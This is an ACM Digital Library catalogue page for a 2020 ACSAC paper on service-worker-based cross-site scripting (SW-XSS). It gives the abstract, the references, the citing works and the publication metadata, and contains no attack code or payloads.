research-article

Public Access

Security Study of Service Worker Cross-Site Scripting.

Authors:

Phakpoom Chinprutthiwong,

GuangLiang Yang,

Guofei GuAuthors Info & Claims

ACSAC '20: Proceedings of the 36th Annual Computer Security Applications Conference

Pages 643 - 654

https://doi.org/10.1145/3427228.3427290

Published: 08 December 2020 Publication History

All formats PDF

Abstract

Nowadays, modern websites are utilizing service workers to provide users with app-like functionalities such as offline mode and push notifications. To handle such features, the service worker is equipped with special privileges including HTTP traffic manipulation. Thus, it is designed with security as a priority. However, we find that many websites introduce a questionable practice that can jeopardize the security of a service worker.

In this work, we demonstrate how this practice can result in a cross-site scripting (XSS) attack inside a service worker, allowing an attacker to obtain and leverage service worker privileges. Due to the uniqueness of these privileges, such attacks can lead to more severe consequences compared to a typical XSS attack. We term this type of vulnerability as Service Worker based Cross-Site Scripting (SW-XSS). To assess the real-world security impact, we develop a tool called SW-Scanner and use it to analyze top websites in the wild. Our findings reveal a worrisome trend. In total, we find 40 websites vulnerable to this attack including several popular and high ranking websites. Finally, we discuss potential defense solutions to mitigate the SW-XSS vulnerability.

References

[1]

[1] [n.d.]. https://babeljs.io/.

[2]

[2] [n.d.]. https://maierfelix.github.io/Iroh/.

[3]

[3] [n.d.]. https://github.com/maierfelix/Iroh/blob/master/API.md.

[4]

[4] [n.d.]. https://www.similarweb.com/.

[5]

[5] [n.d.]. https://web.archive.org/.

[6]

[6] [n.d.]. https://www.openbugbounty.org/.

[7]

[7] [n.d.]. https://www.w3.org/TR/CSP3/#framework-directive-source-list.

[8]

[8] [n.d.]. https://tools.ietf.org/html/rfc3986#section-3.3.

[9]

[9] [n.d.]. https://developer.mozilla.org/en-US/docs/Web/Manifest/serviceworker.

[10]

[10] [n.d.]. https://c0nradsc0rner.com/2016/06/17/xss-persistence-using-jsonp-and-serviceworkers/.

[11]

[11] [n.d.]. https://jshint.com/.

[12]

[12] [n.d.]. https://github.com/SonarSource/SonarJS.

[13]

Jordan Jueckstock and Alexandros Kapravelos. 2019. VisibleV8: In-browser Monitoring of JavaScript in the Wild. In Proceedings of the ACM Internet Measurement Conference (IMC).

Digital Library

[14]

Tobias Lauinger, Abdelberi Chaabane, Sajjad Arshad, William Robertson, Christo Wilson, and Engin Kirda. 2017. Thou Shalt Not Depend on Me: Analysing the Use of Outdated JavaScript Libraries on the Web. In 24th Annual Network and Distributed System Security Symposium, NDSS 2017, San Diego, California, USA, February 26 - March 1, 2017. The Internet Society.

[15]

Victor Le Pochat, Tom Van Goethem, Samaneh Tajalizadehkhoob, Maciej Korczyński, and Wouter Joosen. 2019. Tranco: A Research-Oriented Top Sites Ranking Hardened Against Manipulation. In Proceedings of the 26th Annual Network and Distributed System Security Symposium(NDSS 2019). https://doi.org/10.14722/ndss.2019.23386

[16]

Jiyeon Lee, Hayeon Kim, Junghwan Park, Insik Shin, and Sooel Son. 2018. Pride and Prejudice in Progressive Web Apps: Abusing Native App-like Features in Web Applications. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security (Toronto, Canada) (CCS ’18). ACM, New York, NY, USA, 1731–1746. https://doi.org/10.1145/3243734.3243867

Digital Library

[17]

Sebastian Lekies, Ben Stock, and Martin Johns. 2013. 25 million flows later: large-scale detection of DOM-based XSS. In 2013 ACM SIGSAC Conference on Computer and Communications Security, CCS’13, Berlin, Germany, November 4-8, 2013, Ahmad-Reza Sadeghi, Virgil D. Gligor, and Moti Yung(Eds.). ACM, 1193–1204. https://doi.org/10.1145/2508859.2516703

Digital Library

[18]

William Melicher, Anupam Das, Mahmood Sharif, Lujo Bauer, and Limin Jia. 2018. Riding out DOMsday: Towards Detecting and Preventing DOM Cross-Site Scripting. In 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society. http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2018/02/ndss2018_07A-4_Melicher_paper.pdf

[19]

Abner Mendoza and Guofei Gu. 2018. Mobile Application Web API Reconnaissance: Web-to-Mobile Inconsistencies & Vulnerabilities. In 2018 IEEE Symposium on Security and Privacy, SP 2018, Proceedings, 21-23 May 2018, San Francisco, California, USA. IEEE, 756–769. https://doi.org/10.1109/SP.2018.00039

[20]

Nick Nikiforakis, Luca Invernizzi, Alexandros Kapravelos, Steven Van Acker, Wouter Joosen, Christopher Kruegel, Frank Piessens, and Giovanni Vigna. 2012. You are what you include: large-scale evaluation of remote javascript inclusions. In the ACM Conference on Computer and Communications Security, CCS’12, Raleigh, NC, USA, October 16-18, 2012, Ting Yu, George Danezis, and Virgil D. Gligor(Eds.). ACM, 736–747. https://doi.org/10.1145/2382196.2382274

Digital Library

[21]

Panagiotis Papadopoulos, Panagiotis Ilia, Michalis Polychronakis, Evangelos P. Markatos, Sotiris Ioannidis, and Giorgos Vasiliadis. 2019. Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Computation. In 26th Annual Network and Distributed System Security Symposium, NDSS 2019, San Diego, California, USA, February 24-27, 2019. The Internet Society. https://www.ndss-symposium.org/ndss-paper/master-of-web-puppets-abusing-web-browsers-for-persistent-and-stealthy-computation/

[22]

Prateek Saxena, Steve Hanna, Pongsin Poosankam, and Dawn Song. 2010. FLAX: Systematic Discovery of Client-side Validation Vulnerabilities in Rich Web Applications. In Proceedings of the Network and Distributed System Security Symposium, NDSS 2010, San Diego, California, USA, 28th February - 3rd March 2010. The Internet Society. https://www.ndss-symposium.org/ndss2010/flax-systematic-discovery-client-side-validation-vulnerabilities-rich-web-applications

[23]

Marius Steffens, Christian Rossow, Martin Johns, and Ben Stock. 2019. Don’t Trust The Locals: Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the Wild. In 26th Annual Network and Distributed System Security Symposium, NDSS 2019, San Diego, California, USA, February 24-27, 2019. The Internet Society. https://www.ndss-symposium.org/ndss-paper/dont-trust-the-locals-investigating-the-prevalence-of-persistent-client-side-cross-site-scripting-in-the-wild/

[24]

Ben Stock, Martin Johns, Marius Steffens, and Michael Backes. 2017. How the Web Tangled Itself: Uncovering the History of Client-Side Web (In)Security. In 26th USENIX Security Symposium, USENIX Security 2017, Vancouver, BC, Canada, August 16-18, 2017., Engin Kirda and Thomas Ristenpart (Eds.). USENIX Association, 971–987. https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/stock

[25]

Tung Tran, Riccardo Pelizzi, and R. Sekar. 2015. JaTE: Transparent and Efficient JavaScript Confinement. In Proceedings of the 31st Annual Computer Security Applications Conference (Los Angeles, CA, USA) (ACSAC 2015). ACM, New York, NY, USA, 151–160. https://doi.org/10.1145/2818000.2818019

Digital Library

[26]

Takuya Watanabe, Eitaro Shioji, Mitsuaki Akiyama, and Tatsuya Mori. 2020. Melting Pot of Origins: Compromising the Intermediary Web Services that Rehost Websites.

[27]

Lukas Weichselbaum, Michele Spagnuolo, Sebastian Lekies, and Artur Janc. 2016. CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy. In Proceedings of the 23rd ACM Conference on Computer and Communications Security. Vienna, Austria.

Digital Library

[28]

Y. Zhou and D. Evans. 2015. Understanding and Monitoring Embedded Web Scripts. In Proc. IEEE Symp. Security and Privacy. 850–865. https://doi.org/10.1109/SP.2015.57

Digital Library

Cited By

Jeong YLee WHur J(2023)A Honey postMessage, but a Heart of Gall: Exploiting Push Service in Service Workers Via postMessageProceedings of the 2023 ACM Asia Conference on Computer and Communications Security10.1145/3579856.3590342(785-796)Online publication date: 10-Jul-2023
https://dl.acm.org/doi/10.1145/3579856.3590342
Josephe AChrysoulas CPeng TBoudani BIatropoulos IPitropakis N(2023)Progressive Web Apps to Support (Critical) Systems in Low or No Connectivity Areas2023 IEEE IAS Global Conference on Emerging Technologies (GlobConET)10.1109/GlobConET56651.2023.10150058(1-6)Online publication date: 19-May-2023
https://doi.org/10.1109/GlobConET56651.2023.10150058
Polireddi NChaitanya K(2023)Web accessibility evaluation of private and government websites for people with disabilities through fuzzy classifier in the USASoft Computing10.1007/s00500-023-08740-6Online publication date: 13-Jul-2023
https://doi.org/10.1007/s00500-023-08740-6
Show More Cited By

Index Terms

Security Study of Service Worker Cross-Site Scripting.
1. Security and privacy
2. Social and professional topics
  1. Computing / technology policy
    1. Computer crime

Index terms have been assigned to the content through auto-classification.

Recommendations

The Service Worker Hiding in Your Browser: The Next Web Attack Target?
RAID '21: Proceedings of the 24th International Symposium on Research in Attacks, Intrusions and Defenses

In recent years, service workers are gaining attention from both web developers and attackers due to the unique features they provide. Recent findings have shown that an attacker can register a malicious service worker to take advantage of the victim ...
Static detection of cross-site scripting vulnerabilities
ICSE '08: Proceedings of the 30th international conference on Software engineering

Web applications support many of our daily activities, but they often have security problems, and their accessibility makes them easy to exploit. In cross-site scripting (XSS), an attacker exploits the trust a web client (browser) has for a trusted ...
Twenty-two years since revealing cross-site scripting attacks: A systematic mapping and a comprehensive survey
Abstract
Cross-site scripting (XSS) is one of the major threats menacing the privacy of data and the navigation of trusted web applications. Since its disclosure in late 1999 by Microsoft security engineers, several techniques have been developed with the ...

Comments

Information & Contributors

Information

Published In

cover image ACM Other conferences

ACSAC '20: Proceedings of the 36th Annual Computer Security Applications Conference

December 2020

962 pages

ISBN:9781450388580

DOI:10.1145/3427228

Copyright © 2020 ACM.

Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than the author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from [email protected].

Publisher

Association for Computing Machinery

New York, NY, United States

Publication History

Published: 08 December 2020

Permissions

Request permissions for this article.

Request Permissions

Check for updates

Author Tags

Qualifiers

Research-article
Research
Refereed limited

Funding Sources

Conference

ACSAC '20

ACSAC '20: Annual Computer Security Applications Conference

December 7 - 11, 2020

Austin, USA

Acceptance Rates

Overall Acceptance Rate 104 of 497 submissions, 21%

Contributors

Other Metrics

View Article Metrics

Bibliometrics & Citations

Bibliometrics

Article Metrics

10
Total Citations
View Citations
3,973
Total Downloads

Downloads (Last 12 months)1,003
Downloads (Last 6 weeks)158

Reflects downloads up to 03 Mar 2025

Other Metrics

View Author Metrics

Citations

Cited By

Jeong YLee WHur J(2023)A Honey postMessage, but a Heart of Gall: Exploiting Push Service in Service Workers Via postMessageProceedings of the 2023 ACM Asia Conference on Computer and Communications Security10.1145/3579856.3590342(785-796)Online publication date: 10-Jul-2023
https://dl.acm.org/doi/10.1145/3579856.3590342
Josephe AChrysoulas CPeng TBoudani BIatropoulos IPitropakis N(2023)Progressive Web Apps to Support (Critical) Systems in Low or No Connectivity Areas2023 IEEE IAS Global Conference on Emerging Technologies (GlobConET)10.1109/GlobConET56651.2023.10150058(1-6)Online publication date: 19-May-2023
https://doi.org/10.1109/GlobConET56651.2023.10150058
Polireddi NChaitanya K(2023)Web accessibility evaluation of private and government websites for people with disabilities through fuzzy classifier in the USASoft Computing10.1007/s00500-023-08740-6Online publication date: 13-Jul-2023
https://doi.org/10.1007/s00500-023-08740-6
Karavashkin LMolodyakov SMedvedev B(2023)Caching Data in a Web Audio Service Using Progressive Web Apps TechnologiesCyber-Physical Systems and Control II10.1007/978-3-031-20875-1_34(372-380)Online publication date: 21-Jan-2023
https://doi.org/10.1007/978-3-031-20875-1_34
Roumeliotis KTselikas N(2022)Evaluating Progressive Web App Accessibility for People with DisabilitiesNetwork10.3390/network20200222:2(350-369)Online publication date: 8-Jun-2022
https://doi.org/10.3390/network2020022
Lin SXin RGoel AYang XYin HStavrou ACremers CShi E(2022)InviCloakProceedings of the 2022 ACM SIGSAC Conference on Computer and Communications Security10.1145/3548606.3559336(1947-1961)Online publication date: 7-Nov-2022
https://dl.acm.org/doi/10.1145/3548606.3559336
Jeong YHur J(2022)A Survey on Vulnerabilities of Service Workers2022 13th International Conference on Information and Communication Technology Convergence (ICTC)10.1109/ICTC55196.2022.9952818(2080-2082)Online publication date: 19-Oct-2022
https://doi.org/10.1109/ICTC55196.2022.9952818
Subramani KJueckstock JKapravelos APerdisci R(2022)SoK: Workerounds - Categorizing Service Worker Attacks and Mitigations2022 IEEE 7th European Symposium on Security and Privacy (EuroS&P)10.1109/EuroSP53844.2022.00041(555-571)Online publication date: Jun-2022
https://doi.org/10.1109/EuroSP53844.2022.00041
Pantelakis GPapadopoulos PKourtellis NMarkatos E(2022)Measuring the (Over)use of Service Workers for In-Page Push Advertising PurposesPassive and Active Measurement10.1007/978-3-030-98785-5_19(426-438)Online publication date: 28-Mar-2022
https://dl.acm.org/doi/10.1007/978-3-030-98785-5_19
Chinprutthiwong PVardhan RYang GZhang YGu GBilge LDumitras T(2021)The Service Worker Hiding in Your Browser: The Next Web Attack Target?Proceedings of the 24th International Symposium on Research in Attacks, Intrusions and Defenses10.1145/3471621.3471845(312-323)Online publication date: 6-Oct-2021
https://dl.acm.org/doi/10.1145/3471621.3471845

View Options

View options

PDF

View or Download as a PDF file.

eReader

View online with eReader.

HTML Format

View this article in HTML Format.

Login options

Check if you have access through your login credentials or your institution to get full access on this article.

Full Access

Get this Publication

Figures

Tables

Media

View Table of Conten